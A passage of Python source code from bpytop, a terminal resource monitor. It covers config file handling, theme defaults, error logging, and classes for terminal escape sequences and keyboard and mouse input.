args.add_argument("-lc", "--low-color", action="store_true", help = "disable truecolor, converts 24-bit colors to 256-color")
args.add_argument("-v", "--version", action="store_true", help = "show version info and exit")
args.add_argument("--debug", action="store_true", help = "start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_BOXES: str = stdargs.boxes
LOW_COLOR: bool = stdargs.low_color
DEBUG: bool = stdargs.debug
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Sets if 24-bit truecolor should be used, will convert 24-bit colors to 256 color (6x6x6 color cube) if false.
truecolor=$truecolor
#* Manually set which boxes to show. Available values are "cpu mem net proc", seperate values with whitespace.
shown_boxes="$shown_boxes"
#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes update multiplier, sets how often the process list is updated as a multiplier of "update_ms".
#* Set to 2 or higher to greatly decrease bpytop cpu usage. (Only integers)
proc_update_mult=$proc_update_mult
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Sets the CPU stat shown in upper half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_upper="$cpu_graph_upper"
#* Sets the CPU stat shown in lower half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_lower="$cpu_graph_lower"
#* Toggles if the lower CPU graph should be inverted.
cpu_invert_lower=$cpu_invert_lower
#* Set to True to completely disable the lower CPU graph.
cpu_single_graph=$cpu_single_graph
#* Shows the system uptime in the CPU box.
show_uptime=$show_uptime
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Which sensor to use for cpu temperature, use options menu to select from list of available sensors.
cpu_sensor=$cpu_sensor
#* Show temperatures for cpu cores also if check_temp is True and sensors has been found
show_coretemp=$show_coretemp
#* Which temperature scale to use, available values: "celsius", "fahrenheit", "kelvin" and "rankine"
temp_scale="$temp_scale"
#* Show CPU frequency, can cause slowdowns on certain systems with some versions of psutil
show_cpu_freq=$show_cpu_freq
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be full path of a mountpoint, separate multiple values with a comma ",".
#* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=/boot, /home/user"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Filter out non physical disks. Set this to False to include network disks, RAM disks and similar.
only_physical=$only_physical
#* Read disks list from /etc/fstab. This also disables only_physical.
use_fstab=$use_fstab
#* Toggles if io stats should be shown in regular disk usage view
show_io_stat=$show_io_stat
#* Toggles io mode for disks, showing only big graphs for disk read/write speeds.
io_mode=$io_mode
#* Set to True to show combined read/write io graphs in io mode.
io_graph_combined=$io_graph_combined
#* Set the top speed for the io graphs in MiB/s (10 by default), use format "device:speed" seperate disks with a comma ",".
#* Example: "/dev/sda:100, /dev/sdb:20"
io_graph_speeds="$io_graph_speeds"
#* Set fixed values for network graphs, default "10M" = 10 Mibibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwith usage or auto scale, bandwith usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Starts with the Network Interface specified here.
net_iface="$net_iface"
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetical
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "#00",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
SUBSCRIPT: Tuple[str, ...] = ("₀", "₁", "₂", "₃", "₄", "₅", "₆", "₇", "₈", "₉")
SUPERSCRIPT: Tuple[str, ...] = ("⁰", "¹", "²", "³", "⁴", "⁵", "⁶", "⁷", "⁸", "⁹")
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "use_fstab", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "theme_background",
"net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp", "proc_update_mult", "shown_boxes", "net_iface", "only_physical",
"truecolor", "io_mode", "io_graph_combined", "io_graph_speeds", "show_io_stat", "cpu_graph_upper", "cpu_graph_lower", "cpu_invert_lower",
"cpu_single_graph", "show_uptime", "temp_scale", "show_cpu_freq"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
truecolor: bool = True
shown_boxes: str = "cpu mem net proc"
update_ms: int = 2000
proc_update_mult: int = 2
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
cpu_graph_upper: str = "total"
cpu_graph_lower: str = "total"
cpu_invert_lower: bool = True
cpu_single_graph: bool = False
show_uptime: bool = True
check_temp: bool = True
cpu_sensor: str = "Auto"
show_coretemp: bool = True
temp_scale: str = "celsius"
show_cpu_freq: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
only_physical: bool = True
use_fstab: bool = False
show_io_stat: bool = True
io_mode: bool = False
io_graph_combined: bool = False
io_graph_speeds: str = ""
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
net_iface: str = ""
show_battery: bool = True
show_init: bool = False
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
cpu_percent_fields: List = ["total"]
cpu_percent_fields.extend(getattr(psutil.cpu_times_percent(), "_fields", []))
temp_scales: List[str] = ["celsius", "fahrenheit", "kelvin", "rankine"]
cpu_sensors: List[str] = [ "Auto" ]
if hasattr(psutil, "sensors_temperatures"):
try:
_temps = psutil.sensors_temperatures()
if _temps:
for _name, _entries in _temps.items():
for _num, _entry in enumerate(_entries, 1):
if hasattr(_entry, "current"):
cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}')
except:
pass
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
self.info.append(f'Config file malformatted or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
self.info.append(f'Config file version and bpytop version missmatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif SYSTEM == "BSD" and os.path.isfile("/usr/local/etc/bpytop.conf"):
conf_file = "/usr/local/etc/bpytop.conf"
elif SYSTEM != "BSD" and os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
continue
if not '=' in line:
continue
key, line = line.split('=', maxsplit=1)
if not key in self.keys:
continue
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "update_ms" in new_config and int(new_config["update_ms"]) < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors:
new_config["cpu_sensor"] = "_error_"
self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!')
if "shown_boxes" in new_config and not new_config["shown_boxes"] == "":
for box in new_config["shown_boxes"].split(): #type: ignore
if not box in ["cpu", "mem", "net", "proc"]:
new_config["shown_boxes"] = "_error_"
self.warnings.append(f'Config key "shown_boxes" contains invalid box names!')
break
for cpu_graph in ["cpu_graph_upper", "cpu_graph_lower"]:
if cpu_graph in new_config and not new_config[cpu_graph] in self.cpu_percent_fields:
new_config[cpu_graph] = "_error_"
self.warnings.append(f'Config key "{cpu_graph}" does not contain an available cpu stat attribute!')
if "temp_scale" in new_config and not new_config["temp_scale"] in self.temp_scales:
new_config["temp_scale"] = "_error_"
self.warnings.append(f'Config key "temp_scale" does not contain a recognized temperature scale!')
return new_config
def save_config(self):
'''Save current config to config file if difference in values or version, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
DEBUG = CONFIG.log_level == "DEBUG"
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if ARG_BOXES:
_new_boxes: List = []
for _box in ARG_BOXES.split():
if _box in ["cpu", "mem", "net", "proc"]:
_new_boxes.append(_box)
CONFIG.shown_boxes = " ".join(_new_boxes)
del _box, _new_boxes
if SYSTEM == "Linux" and not os.path.isdir("/sys/class/power_supply"):
CONFIG.show_battery = False
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
old_boxes: List = []
min_width: int = 0
min_height: int = 0
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if Init.running: cls.resized = False; return
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and cls.old_boxes == Box.boxes and not force: return
if force: Collector.collect_interrupt = True
if cls.old_boxes != Box.boxes:
w_p = h_p = 0
cls.min_width = cls.min_height = 0
cls.old_boxes = Box.boxes.copy()
for box_class in Box.__subclasses__():
for box_name in Box.boxes:
if box_name in str(box_class).capitalize():
if not (box_name == "cpu" and "proc" in Box.boxes) and not (box_name == "net" and "mem" in Box.boxes) and w_p + box_class.width_p <= 100:
w_p += box_class.width_p
cls.min_width += getattr(box_class, "min_w", 0)
if not (box_name in ["mem", "net"] and "proc" in Box.boxes) and h_p + box_class.height_p <= 100:
h_p += box_class.height_p
cls.min_height += getattr(box_class, "min_h", 0)
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < cls.min_width or cls._h < cls.min_height):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
box_width = min(50, cls._w - 2)
Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < cls.min_width or cls._h < cls.min_height:
Draw.now(Term.clear)
box_width = min(50, cls._w - 2)
Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, box_width, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < cls.min_width else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < cls.min_height else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.d(1)}{Mv.l(25)}{Colors.default}{Colors.black_bg}Current config need: {cls.min_width} x {cls.min_height}{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
while Key.has_key():
if Key.last() == "q": clean_quit()
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
Collector.proc_counter = 1
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
@staticmethod
def title(text: str = "") -> str:
out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
if out and text: out += " "
if text: out += f'{text}'
return f'\033]0;{out}\a'
class Fx:
"""Text effects
* trans(string: str): Replace whitespace with escape move right to not overwrite background behind whitespace.
* uncolor(string: str) : Removes all 24-bit color and returns string ."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
restore: str = "\033[u" #* Restore saved cursor postion
t = to
r = right
l = left
u = up
d = down
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
return bool(cls.list)
@classmethod
def clear(cls):
cls.list = []
@classmethod
def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If first character is a escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting a IO Block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
